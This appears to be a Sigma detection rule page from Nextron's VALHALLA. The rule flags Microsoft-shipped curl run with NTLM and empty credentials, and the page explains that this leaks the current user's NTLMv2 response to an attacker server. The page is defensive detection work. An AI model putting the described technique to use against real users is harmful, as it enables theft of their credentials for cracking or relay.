NTLM Hash Leak Via Curl NTLM Authentication

Rule Info

Name
NTLM Hash Leak Via Curl NTLM Authentication
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects the use of curl with NTLM authentication and empty credentials (-u :), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an attacker-controlled server, enabling offline cracking or relay attacks. When no credentials are provided, the Microsoft-shipped curl passes a NULL identity to Windows SSPI, which automatically falls back to the current user's logon session credentials stored in LSASS — without requiring a plaintext password. This behavior is exclusive to the curl binary shipped by Microsoft (available since Windows 10 / Windows Server 2019), which is built with SSPI support.
Reference
https://github.com/curl/curl/blob/master/lib/vauth/ntlm_sspi.c#L128-L140
Date
2026-06-04 00:00:00
Modified
None
Id
916eb839-895e-47f8-99ee-3008bf377a3e
Tags
attack.credential-access attack.t1187
Type
Community Rule
Link to Public Repo
https://github.com/SigmaHQ/sigma/search?q=916eb839-895e-47f8-99ee-3008bf377a3e

Rule History

Author
Title
Date
Commit
Swachchhanda Shrawan Poudel
Merge PR #6049 from @swachchhanda000 - Add `NTLM Hash Leak Via Curl NTLM Authentication`
2026-06-11
20da15c61
THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022